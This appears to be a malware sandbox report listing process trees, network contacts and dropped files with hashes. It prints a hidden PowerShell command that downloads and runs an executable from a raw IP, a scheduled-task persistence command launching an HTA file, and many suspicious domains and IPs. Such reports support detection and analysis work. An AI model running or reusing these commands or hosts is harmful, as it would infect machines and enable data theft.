C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "XgBsCma2dsa" /tr "mshta \"C:\Temp\ILvKar5Uh.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\ILvKar5Uh.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe

"C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe

"C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe"

C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe

"C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe"

C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe

"C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe

"C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe"

C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe

"C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe"

C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe

"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"

C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe

"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"

C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe

"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"

C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe

"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2236 -ip 2236

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 964

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\ProgramData\eltqgcf\oamb.exe

C:\ProgramData\eltqgcf\oamb.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe

"C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe"

C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 calmingtefxtures.run udp
US 172.67.158.171:443 calmingtefxtures.run tcp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.48.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 104.21.74.230:443 tracnquilforest.life tcp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 collapimga.fun udp
US 172.67.166.247:443 collapimga.fun tcp
RU 176.113.115.6:80 176.113.115.6 tcp
US 172.67.166.247:443 collapimga.fun tcp
US 172.67.166.247:443 collapimga.fun tcp
RU 185.215.113.115:80 185.215.113.115 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 www.google.com udp
NL 172.217.23.196:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.202:443 ogads-pa.googleapis.com udp
NL 172.217.168.206:443 apis.google.com udp
NL 142.250.179.202:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.39.110:443 play.google.com udp
NL 142.251.39.110:443 play.google.com tcp
NL 142.251.39.110:443 play.google.com udp
NL 142.251.39.110:443 play.google.com tcp
US 8.8.8.8:53 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
NL 142.250.179.129:443 clients2.googleusercontent.com udp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
RU 185.215.113.115:80 185.215.113.115 tcp
US 104.21.81.29:443 disobilittyhell.live tcp
RU 185.215.113.16:80 185.215.113.16 tcp
N/A 127.0.0.1:9229 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
RU 185.215.113.115:80 185.215.113.115 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
DE 104.194.157.122:80 104.194.157.122 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 172.67.158.171:443 calmingtefxtures.run tcp
US 104.21.48.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.74.230:443 tracnquilforest.life tcp
US 104.21.96.1:443 exarthynature.run tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 boltetuurked.digital udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 decreaserid.world udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
DE 93.186.202.3:4000 towerbingobongoboom.com tcp
DE 93.186.202.3:5111 towerbingobongoboom.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe

MD5 30e223a129babc795c38e7b6bb3ee202
SHA1 99ac334d2de4224b19212f16922babfc0b424d92
SHA256 a971b93985a01d792963c3a7635eb2905487ba7dcf2623a4361907e1e82dcafe
SHA512 e6e8eda28fc4c8359426749b9bd3ec51c5ea062b35349c4db6a1235cbbebcf41d947573961e85355468538fae3fa767d03de16b388ac18ba4b9ac8c08c2d7fec

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe

MD5 a92d6465d69430b38cbc16bf1c6a7210
SHA1 421fadebee484c9d19b9cb18faf3b0f5d9b7a554
SHA256 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
SHA512 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe

MD5 9e3110a7e155297b4a8b2324c31147d2
SHA1 cffe1b51d8579cefd79a74df881ac5529555525b
SHA256 5785fdaa656a4cb5b6fd42f528be1c3326ed92696b4c6e176779a5d4d2cc883f
SHA512 9cd222acd97169febeb98990fbae502aa99aade0f9b981ba8cd88f2c7a8b22a2cfcf3909f432a8ad532fdd19d4d4eb863b890460e15792a6fa4229dc762377e3

memory/836-28-0x0000000001000000-0x0000000001304000-memory.dmp

memory/836-29-0x0000000001000000-0x0000000001304000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe

MD5 977cb8c87f5af026b73fde1dc4b75a0e
SHA1 8b5bb58ca523b459afbb469bc1fedc0aebb1155f
SHA256 1e068af2dd82efea11c6eaffb036901f5653fd63133ca8e99ff3e62d7dd403a2
SHA512 43145a48cbf389fd96c386a3fdb238b2105a6b629284802ccc4b4029bc9e1e6d1d9d031c6452ae9f26f3b19db97ee0fe400a6d28135c2bd4f1378b1e8ab69f5e

memory/5004-33-0x0000000000FB0000-0x0000000001659000-memory.dmp

memory/5004-34-0x0000000061E00000-0x0000000061EF3000-memory.dmp

\??\pipe\crashpad_1640_DYWSSOXQTXGGJLPE

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\scoped_dir1640_786189774\9f45fb85-752d-4998-a72d-bbb72b3b408f.tmp

MD5 eae462c55eba847a1a8b58e58976b253
SHA1 4d7c9d59d6ae64eb852bd60b48c161125c820673
SHA256 ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad
SHA512 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe

MD5 139801ec12921d4a10cade0e8bd14581
SHA1 19e4ea0a6204a9256bb2671aec86b1942d0bb63c
SHA256 8a32ddf6678734e654e2c128673789991b08f31d4c0049f168774f0b056a2796
SHA512 2d6c0a6923b278d648b20f3091cabdf889f5ae7e767675c8eb93fb23f607b1e6cb8ea891bf827932efa78dddddb32671045d2e52adac73ff764c7286bc542601

C:\Users\Admin\AppData\Local\Temp\scoped_dir1640_786189774\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

memory/5452-482-0x0000000001540000-0x000000000159F000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 b6aa6f6737aea3db522b6254253be4c9
SHA1 adffd4e197b73b11710998acaae4a81df6f5d360
SHA256 eda45c4be63db8e549ec6b8768640e572bdcc7a57572bc41fba3b81485e06f2f
SHA512 6c4ff486b7107a426710917249b969948c7d57d60d6569aed03bd12f6f68387a98fec5c945f0620a90fe1b78f97b8442267b3b4708777f579a92a2d7420a082f

memory/5004-493-0x0000000000FB0000-0x0000000001659000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0621e31d12b6e16ab28de3e74462a4ce
SHA1 0af6f056aff6edbbc961676656d8045cbe1be12b
SHA256 1fd3365fdb49f26471ce9e348ce54c9bc7b66230118302b32074029d88fb6030
SHA512 bf0aa5b97023e19013d01abd3387d074cdd5b57f98ec4b0241058b39f9255a7bbab296dce8617f3368601a3d751a6a66dc207d8dd3fc1cba9cac5f98e3127f6f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\fc049f7a-1008-4e4e-90cb-9c0b9dd0f7b7.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 173d575d8212fda39e25ebe601791d36
SHA1 b6cd1c8c12dcb22b6089175439b834338b92c59b
SHA256 43126a5b2e47220954a9ea8abcf768e3f38d165bceafe8b15d86e08e7d1af77c
SHA512 046192919c18a56930ccb2398d7c7106eddb0472149cb1ab4eb61ffe1c8b62c7bf012f08b6ac8eecfefe1a0ab807546bea5a6f90f0873440c17189a0438af767

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 56361f50f0ee63ef0ea7c91d0c8b847a
SHA1 35227c31259df7a652efb6486b2251c4ee4b43fc
SHA256 7660beecfee70d695225795558f521c3fb2b01571c224b373d202760b02055c0
SHA512 94582035220d2a78dfea9dd3377bec3f4a1a1c82255b3b74f4e313f56eb2f7b089e36af9fceea9aa83b7c81432622c3c7f900008a1bdb6b1cd12c4073ae4b8a2

C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe

MD5 454bd2cde5257315f133cfc64bcd0351
SHA1 ccfb541cc802100b3d0bc4c4147bf0363675be2b
SHA256 61a5dd7249aa43b42abc2ce22d7937dc68c7c3748d20784cb86dd7135080d580
SHA512 da676aed2ed94912d7a8d84c670d6c49a91a3bd932cf88bfa141e8db16c358c64ecaa561ca34f53f9ead0e4fdbdd534aa380edba700f2582c9606a4ab270838f

C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta

MD5 57206b089ec9eb7b8306dbb5103d7a1f
SHA1 40996be44267e881e6d90db8943c180c5cd713c9
SHA256 2cbf10cb52bf94396760b3d29608b6279d679de0fae37a74eedf16acccb92e32
SHA512 f91926d2c8986d20a4de61c2dc592d4d3b062611e828fc40c33321ac2254ba780ff3a441acb1aefbb85e48ca248d3075e94dfd3973c6a721e0a75a4a6261d709

memory/6128-577-0x00000000051F0000-0x0000000005226000-memory.dmp

memory/6128-578-0x0000000005910000-0x0000000005F38000-memory.dmp

memory/6128-579-0x0000000005820000-0x0000000005842000-memory.dmp

memory/6128-580-0x00000000060B0000-0x0000000006116000-memory.dmp

memory/6128-581-0x0000000006130000-0x0000000006196000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eb1ze1h5.ul1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/6128-591-0x00000000061C0000-0x0000000006514000-memory.dmp

memory/6128-592-0x00000000067C0000-0x00000000067DE000-memory.dmp

memory/6128-593-0x0000000006800000-0x000000000684C000-memory.dmp

memory/6128-594-0x0000000007EF0000-0x000000000856A000-memory.dmp

memory/6128-595-0x0000000006CD0000-0x0000000006CEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

memory/6128-604-0x0000000007CD0000-0x0000000007D66000-memory.dmp

memory/6128-605-0x0000000007C30000-0x0000000007C52000-memory.dmp

memory/6128-608-0x0000000008B20000-0x00000000090C4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d17294f0-6b51-480e-b0d5-12ec554289c7.dmp

MD5 458298981f53ea4a9ce016a0e78b87fb
SHA1 6e69ac9cb3033f22d080d528f5cfa753b61afb57
SHA256 66e4f516c5a09bfd0409cf31a4c1d52882570a934569ab908f47fdd7fa5e0cda
SHA512 2a325e17f95973622f32e2a1c52bb86bec03a653f4410aef84ab4cb14dd3cd09ae4f596abb52a36c4aca168a338d0ca3ea27b370bf5148fbbef05db8fb8bab16

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 25604a2821749d30ca35877a7669dff9
SHA1 49c624275363c7b6768452db6868f8100aa967be
SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

memory/5912-668-0x0000000006430000-0x0000000006784000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 319d73b74a9aaa68b262bdba602a4f50
SHA1 99c445eb03be34c8a4fb5d06a5451d458b81684d
SHA256 05fa07c6d7b8bd1c1d48d4cd1a02989fd6e632ba236543b94182387bcb87329a
SHA512 2a0b8b866f709b8c231d393e3e779bb9d177f6cbefd7e530b22343472eeb1ce28f34080d3508f5f8769833728aceffd823d15d0c74d25a1eafdfe35905173882

memory/5912-670-0x0000000006ED0000-0x0000000006F1C000-memory.dmp

memory/5004-677-0x0000000000FB0000-0x0000000001659000-memory.dmp

memory/5152-692-0x0000000005F90000-0x00000000062E4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 490fd2ec21839c825ef2589f3046770e
SHA1 0cf6253cce81fceac60204348e7e7dc4476496f4
SHA256 eaaf2ecbe65933eebb12e2e8642de68ca1f55283e030e1f4a03bb6c4c0ea016f
SHA512 30295e03ea9ecc33a841e249e0776d75047af56af6411e30ba2e47c60989c7af43c6a512931a67b4a6a3de4e716ca9868bbec740aa856c261b4b41a4bc75af26

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e8f28a867f91d49628e19714ced3af6b
SHA1 7849284287c46066648ddbfd1aaee4f508223ed5
SHA256 e1fbc0d8b7ab330a9e29ea7d4719df2a72519c5fcd2a51ecad267c2411704a45
SHA512 1c461745ae531e01ca8e87e9babda63991aefdf5e7db8de12224bf0d287ef14a5c1a7157373cf595bead9b966cd1e718896ea3e8f3254c88025d9c59f4dd257f

C:\Temp\ILvKar5Uh.hta

MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

memory/5596-720-0x0000000005B20000-0x0000000005E74000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 369745d53108fc6148c8607855ecc862
SHA1 85d431ed5dfbbc47b470d7a2d0d41057b6c09149
SHA256 a6a57238c42dfefc32b78cbd286ba7181150edf53eb00fb5e2f0141d4cd38bc5
SHA512 08f28f5fb35f1e17c73ae07eaed4c00b1bf0c8a3b32b965d488c8b2f7455cd39477b681f55fa5b6ca2ca6eabf0ece178bb0120f57c1e375c6d0d622a2eab4fc7

memory/5596-731-0x00000000061E0000-0x000000000622C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe

MD5 4c3d80aa96c22ae2f7b01a904aef5ba0
SHA1 5a4fe29daf45ada28b3a03a8284dcd098d935942
SHA256 67ff99a32813cf55f119ca58c82c508a4d2d4e535fcc653fda16df801681299f
SHA512 a372cb16a04d2540802ebcfb70c731097c44ae0b9e09d7b161fda8b73d4d4b11194de0c8cb60b2d05a86140b9f4d8258125564678574fa0182e944b5ac93d204

memory/5012-739-0x0000000000090000-0x000000000056E000-memory.dmp

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/4920-772-0x0000000000460000-0x000000000093E000-memory.dmp

memory/5012-771-0x0000000000090000-0x000000000056E000-memory.dmp

memory/5004-788-0x0000000000FB0000-0x0000000001659000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe

MD5 b5001d168ba5139846f2848c8e05a6ee
SHA1 080f353ab857f04ea65b78570bfa998d1e421ea2
SHA256 059e600a06b4b6671fa440728b932adff7d246441bf328fcc4a8e29d4df11a23
SHA512 d608f6f4ed7de73308ab7b231b343d5a832b2c0a68b0d0522d2df4c4a8cc15e12685b2ffcb8232b58b4c519979e4307179964fa4011752288f63f72090828143

memory/5960-803-0x0000000000400000-0x000000000087F000-memory.dmp

memory/4920-806-0x0000000000460000-0x000000000093E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe

MD5 709f20db77537abb6cde29f2fbd767dc
SHA1 a93fb22a5f9f95fd6342c707488b6fe591a63c2e
SHA256 4c10dc8445aba26985e3a84dcc33ba1b2dc3b724e21993b82b6c8dbc8f9431a7
SHA512 dd42980454db014a6eafd078ba3b7c5f4b6b38b5339c512bb25048a27064cf55665868a61890829f446db23869713467bd5110f12008d7363c2537e0d54df21c

memory/4920-814-0x0000000000460000-0x000000000093E000-memory.dmp

memory/5212-822-0x0000000000760000-0x000000000117F000-memory.dmp

memory/5960-823-0x0000000000400000-0x000000000087F000-memory.dmp

memory/5960-824-0x0000000000400000-0x000000000087F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe

MD5 c217106f24ae6e1832d8380cbe1d87e0
SHA1 e805de3353dd76d659999f486b23968babae3c7b
SHA256 bba85826623aa30104d734a17eaf97d6714f80d139ff628152e3371a86209b8b
SHA512 913122846a882246801ad953484b20d1cdf40a9056b03da1a438c78a670b2dbf37876a6d8eef14104f9d60e9e875556ae41f85300bf90a722b1cc0138103bcdb

memory/8-839-0x0000000000C20000-0x0000000000F34000-memory.dmp

memory/5212-838-0x0000000000760000-0x000000000117F000-memory.dmp

memory/4920-841-0x0000000000460000-0x000000000093E000-memory.dmp

memory/5212-842-0x0000000000760000-0x000000000117F000-memory.dmp

memory/8-843-0x0000000000C20000-0x0000000000F34000-memory.dmp

memory/3840-844-0x0000000000310000-0x000000000033F000-memory.dmp

memory/3840-845-0x0000000000310000-0x000000000033F000-memory.dmp

